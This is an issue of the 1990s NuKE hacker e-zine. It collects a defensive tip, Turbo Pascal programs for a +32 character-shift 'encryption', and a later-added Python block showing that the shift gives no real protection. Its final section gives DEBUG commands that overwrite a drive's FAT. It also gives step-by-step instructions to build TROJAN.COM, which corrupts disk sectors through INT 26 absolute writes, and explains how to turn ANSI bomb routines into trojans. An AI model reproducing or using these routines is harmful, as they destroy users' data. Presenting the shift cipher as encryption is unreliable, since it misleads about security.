NuKE Issue 01-024
──────────────────────> Various :
This whole section is dedicated to all kinds of little tricks I've
accumulated over a while.
──> First of all, before this goes any further, anyone who is vulnerable to
hacking (Sysops...), do the following:
RENAME your DEBUG.COM and FORMAT.COM files to something else, or take them
out of the PATH. This gives better protection against ANSI bombs and Batch
file trojans that call on these files to do their work. This might seem
fairly obvious, and perhaps stupid, to some of you, but you would be surprised
at the number of people who get nailed because of this.
──> Well, some people have asked me how to make a program that would encrypt
text files. Well I've thought about it, and came up with a little Turbo Pascal
routine that does the job just fine.

    PROGRAM CRYPT;
    VAR
      f,g  : TEXT;
      ch,b : CHAR;
      c    : BYTE;
    BEGIN
      ASSIGN (f,'TEST.TXT');   { change to ASSIGN (f,ParamStr(1)) if you want to }
      ASSIGN (g,'CRYPT.TXT');  { give the filename on the command line.          }
      RESET (f); REWRITE (g);
      WHILE NOT EOF(f) DO
      Begin
        READ (f,ch);
        c := (ORD(ch) + 32);   { shift the character code up by 32 }
        b := CHR(c);
        WRITE (g,b);
      End;
      CLOSE (f); CLOSE (g);
      ERASE (f); { you might want to take this out if you're unsure about the file }
    END.

This will add 32 to the character value of each character in the text file,
and write it in CRYPT.TXT.
To reverse the encryption, simply compile and run the following.

    PROGRAM UNCRYPT;
    VAR
      f,g  : TEXT;
      ch,b : CHAR;
      c    : BYTE;
    BEGIN
      ASSIGN (f,'TEST.TXT');
      ASSIGN (g,'CRYPT.TXT');  { Same comment as before }
      RESET (g); REWRITE (f);
      WHILE NOT EOF(g) DO
      Begin
        READ (g,ch);
        c := (ORD(ch) - 32);   { shift the character code back down by 32 }
        b := CHR(c);
        WRITE (f,b);
      End;
      CLOSE (f); CLOSE (g); ERASE (g);
    END.

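Added example, not part of the original article: the same +32 byte shift in Python, with a check that recovers the shift from the output alone, which shows the routine hides text from casual viewing but gives no confidentiality. The sample text and function names are constructed for illustration.

```python
# Added example, not from the original article. Sample text is constructed.
SHIFT = 32  # the constant CRYPT adds and UNCRYPT subtracts


def shift_bytes(data: bytes, k: int) -> bytes:
    """Add k to every byte, wrapping at 256; k = -SHIFT undoes k = SHIFT."""
    return bytes((b + k) % 256 for b in data)


def plausibility(data: bytes) -> float:
    """Fraction of bytes that are printable ASCII, TAB, LF or CR."""
    if not data:
        return 0.0
    ok = sum(1 for b in data if 32 <= b < 127 or b in (9, 10, 13))
    return ok / len(data)


def recover_shift(ciphertext: bytes) -> int:
    """Try all 256 shifts and return the one whose output looks most like text."""
    return max(range(256),
               key=lambda k: plausibility(shift_bytes(ciphertext, -k)))


# Constructed sample standing in for TEST.TXT (DOS line endings).
SAMPLE = b"Sysop notes:\r\nBack up the zip files nightly.\r\n"

if __name__ == "__main__":
    crypt = shift_bytes(SAMPLE, SHIFT)           # what CRYPT.TXT would hold
    print(crypt)                                 # CR LF show up as "-*"
    k = recover_shift(crypt)                     # no knowledge of SHIFT needed
    print(k, shift_bytes(crypt, -k) == SAMPLE)
    # Byte 250 wraps to 26 (Ctrl-Z), which Turbo Pascal TEXT files treat as
    # end of file, so a file containing it would not survive the round trip.
    print(shift_bytes(bytes([250]), SHIFT))
```
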
──> Here are a few tricks using DEBUG. First off the following commands, when
entered under the Debug prompt, will rearrange the FATs on a selected drive.
Just pick one:
WCS:100 x 1 100 where x is the drive number: A: = 0, B: = 1, C: = 2 ...
W 1 x 1 100 same as above.
Next, you might have noticed that many ANSI bombs use Debug routines... These
Debug routines can easily be turned into Trojans. I will show you an example
using the Debug routine found in one of the .BMB files found in the RABID ANSI
Bomb Generator 2B:
C:\> DEBUG <CR>
- A <CR>
xxxx:nnnn MOV AL,02 <CR> {replace 02 with 00 for drive A:, 01 for drive B:...}
xxxx:nnnn MOV CX,5 <CR>
xxxx:nnnn MOV DX,0 <CR>
xxxx:nnnn INT 26 <CR>
xxxx:nnnn <CR> {copy down the nnnn number}
- N TROJAN.COM <CR>
- RBX <CR>
BX:0000
:0 <CR>
- RCX <CR>
CX:0000
:nnnn <CR> {type in the nnnn number noted earlier}
- W <CR>
WRITING nnnn BYTES
- Q <CR>
Just run TROJAN.COM. The preceding routine was a primitive variation of the
Corrupt Trojan v2.0 by Acid Face... I have used this with his permission.
To apply this system to other ANSI bomb routines, simply note the commands
issued by the infected file, and proceed in the same way. It might help to
have a copy of that .BMB file used earlier. Also, to see the commands issued
by the ANSI bomb, simply take DEBUG out of the PATH, or rename it, and type in
the ANSI bomb. The commands will scroll harmlessly on the screen.
Mechanix [NuKE]